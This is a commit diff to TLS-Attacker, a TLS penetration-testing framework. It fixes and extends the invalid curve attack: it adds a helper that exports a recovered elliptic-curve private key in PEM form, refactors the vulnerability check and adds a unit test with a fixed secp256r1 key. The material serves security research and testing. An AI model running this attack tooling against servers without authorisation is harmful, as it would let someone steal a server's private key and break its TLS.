Fixes and improvements to the invalid curve attack

Author: jurajsomorovsky

Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/ec/EcPemCreator.java

@@ -0,0 +1,46 @@
+/**
+ * TLS-Attacker - A Modular Penetration Testing Framework for TLS
+ *
+ * Copyright 2014-2017 Ruhr University Bochum / Hackmanit GmbH
+ *
+ * Licensed under Apache License 2.0
+ * http://www.apache.org/licenses/LICENSE-2.0
+ */
+package de.rub.nds.tlsattacker.attacks.ec;
+
+import java.math.BigInteger;
+import java.security.AlgorithmParameters;
+import java.security.KeyFactory;
+import java.security.NoSuchAlgorithmException;
+import java.security.NoSuchProviderException;
+import java.security.PrivateKey;
+import java.security.spec.ECGenParameterSpec;
+import javax.xml.bind.DatatypeConverter;
+import java.security.spec.ECParameterSpec;
+import java.security.spec.ECPrivateKeySpec;
+import java.security.spec.InvalidKeySpecException;
+import java.security.spec.InvalidParameterSpecException;
+
+public class EcPemCreator {
+
+    static final String BEGIN_EC_PRIVATE_KEY = "-----BEGIN EC PRIVATE KEY-----\n";
+    static final String END_EC_PRIVATE_KEY = "-----END EC PRIVATE KEY-----\n";
+
+    private EcPemCreator() {
+
+    }
+
+    public static String createPemFromPrivateEcKey(String namedCurve, BigInteger secret)
+            throws InvalidKeySpecException, InvalidParameterSpecException, NoSuchAlgorithmException,
+            NoSuchProviderException {
+        AlgorithmParameters parameters = AlgorithmParameters.getInstance("EC", "SunEC");
+        parameters.init(new ECGenParameterSpec(namedCurve));
+        ECParameterSpec ecParameters = parameters.getParameterSpec(ECParameterSpec.class);
+        ECPrivateKeySpec privKey = new ECPrivateKeySpec(secret, ecParameters);
+        PrivateKey privateKey = KeyFactory.getInstance("EC").generatePrivate(privKey);
+        String pem = BEGIN_EC_PRIVATE_KEY + DatatypeConverter.printBase64Binary(privateKey.getEncoded())
+                + "\n-----END EC PRIVATE KEY-----\n";
+        return pem;
+    }
+
+}

Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/ec/oracles/RealDirectMessageECOracle.java

@@ -76,6 +76,7 @@ public boolean checkSecretCorrectnes(Point ecPoint, BigInteger secret) {
 
         ECDHClientKeyExchangeMessage message = (ECDHClientKeyExchangeMessage) WorkflowTraceUtil.getFirstSendMessage(
                 HandshakeMessageType.CLIENT_KEY_EXCHANGE, trace);
+        message.prepareComputations();
 
         // modify public point base X coordinate
         ModifiableBigInteger x = ModifiableVariableFactory.createBigIntegerModifiableVariable();
@@ -92,7 +93,6 @@ public boolean checkSecretCorrectnes(Point ecPoint, BigInteger secret) {
         ModifiableByteArray pms = ModifiableVariableFactory.createByteArrayModifiableVariable();
         byte[] explicitePMS = BigIntegers.asUnsignedByteArray(curve.getModulus().bitLength() / 8, secret);
         pms.setModification(ByteArrayModificationFactory.explicitValue(explicitePMS));
-        message.prepareComputations();
         message.getComputations().setPremasterSecret(pms);
 
         if (numberOfQueries % 100 == 0) {

Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/InvalidCurveAttacker.java

@@ -13,6 +13,7 @@
 import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
 import de.rub.nds.modifiablevariable.util.ArrayConverter;
 import de.rub.nds.tlsattacker.attacks.config.InvalidCurveAttackConfig;
+import de.rub.nds.tlsattacker.attacks.ec.EcPemCreator;
 import de.rub.nds.tlsattacker.attacks.ec.ICEAttacker;
 import de.rub.nds.tlsattacker.attacks.ec.oracles.RealDirectMessageECOracle;
 import de.rub.nds.tlsattacker.core.config.Config;
@@ -36,6 +37,10 @@
 import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
 import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
 import java.math.BigInteger;
+import java.security.NoSuchAlgorithmException;
+import java.security.NoSuchProviderException;
+import java.security.spec.InvalidKeySpecException;
+import java.security.spec.InvalidParameterSpecException;
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
 import org.bouncycastle.util.BigIntegers;
@@ -69,6 +74,16 @@ public void executeAttack() {
                 tlsConfig.getDefaultSelectedNamedGroup());
         BigInteger result = attacker.attack();
         LOGGER.info("Result found: {}", result);
+
+        try {
+            String pem = EcPemCreator.createPemFromPrivateEcKey(tlsConfig.getDefaultSelectedNamedGroup().getJavaName(),
+                    result);
+            LOGGER.info("Resulting private key in PEM format:\n{}", pem);
+        } catch (NoSuchAlgorithmException | NoSuchProviderException | InvalidKeySpecException
+                | InvalidParameterSpecException e) {
+            LOGGER.info("Creating a PEM privte key object failed: ", e);
+        }
+
     }
 
     /**
@@ -85,22 +100,18 @@ public Boolean isVulnerable() {
         EllipticCurve curve = CurveFactory.getCurve(config.getNamedGroup());
         Point point = Point.createPoint(config.getPublicPointBaseX(), config.getPublicPointBaseY(),
                 config.getNamedGroup());
-        for (int i = 0; i < getConfig().getProtocolFlows(); i++) {
-            if (config.getPremasterSecret() != null) {
-                premasterSecret = config.getPremasterSecret();
-            } else {
-                Point sharedPoint = curve.mult(new BigInteger("" + i + 1), point);
-                premasterSecret = sharedPoint.getX().getData();
-                if (premasterSecret == null) {
-                    premasterSecret = BigInteger.ZERO;
-                }
-                LOGGER.debug("PMS: " + premasterSecret.toString());
-            }
+
+        int protocolFlows = getConfig().getProtocolFlows();
+        if (config.getPremasterSecret() != null) {
+            protocolFlows = 1;
+        }
+
+        for (int i = 0; i < protocolFlows; i++) {
+            setPremasterSecret(curve, i, point);
             try {
                 WorkflowTrace trace = executeProtocolFlow();
                 if (!WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.SERVER_HELLO, trace)) {
                     LOGGER.info("Did not receive ServerHello. Check your config");
-
                     return null;
                 }
                 if (!WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.FINISHED, trace)) {
@@ -116,6 +127,19 @@ public Boolean isVulnerable() {
         return false;
     }
 
+    private void setPremasterSecret(EllipticCurve curve, int i, Point point) {
+        if (config.getPremasterSecret() != null) {
+            premasterSecret = config.getPremasterSecret();
+        } else {
+            Point sharedPoint = curve.mult(new BigInteger("" + (i + 1)), point);
+            premasterSecret = sharedPoint.getX().getData();
+            if (premasterSecret == null) {
+                premasterSecret = BigInteger.ZERO;
+            }
+            LOGGER.debug("PMS: " + premasterSecret.toString());
+        }
+    }
+
     private WorkflowTrace executeProtocolFlow() {
         Config tlsConfig = getTlsConfig();
         WorkflowTrace trace = new WorkflowConfigurationFactory(tlsConfig).createWorkflowTrace(WorkflowTraceType.HELLO,

Attacks/src/test/java/de/rub/nds/tlsattacker/attacks/ec/EcPemCreatorTest.java

@@ -0,0 +1,26 @@
+/**
+ * TLS-Attacker - A Modular Penetration Testing Framework for TLS
+ *
+ * Copyright 2014-2017 Ruhr University Bochum / Hackmanit GmbH
+ *
+ * Licensed under Apache License 2.0
+ * http://www.apache.org/licenses/LICENSE-2.0
+ */
+package de.rub.nds.tlsattacker.attacks.ec;
+
+import java.math.BigInteger;
+import static org.junit.Assert.assertEquals;
+import org.junit.Test;
+
+public class EcPemCreatorTest {
+
+    @Test
+    public void testConversion() throws Exception {
+        BigInteger key = new BigInteger("45920025678221661724778903394380424235512150060610104911582497586860611281771");
+        String curve = "secp256r1";
+        String result = EcPemCreator.createPemFromPrivateEcKey(curve, key);
+        assertEquals(EcPemCreator.BEGIN_EC_PRIVATE_KEY
+                + "MEECAQAwEwYHKoZIzj0CAQYIKoZIzj0DAQcEJzAlAgEBBCBlhdBA2pVVpBpVqfWQLlnfZyfy1SNQtMubbhwcCFsjaw==" + "\n"
+                + EcPemCreator.END_EC_PRIVATE_KEY, result);
+    }
+}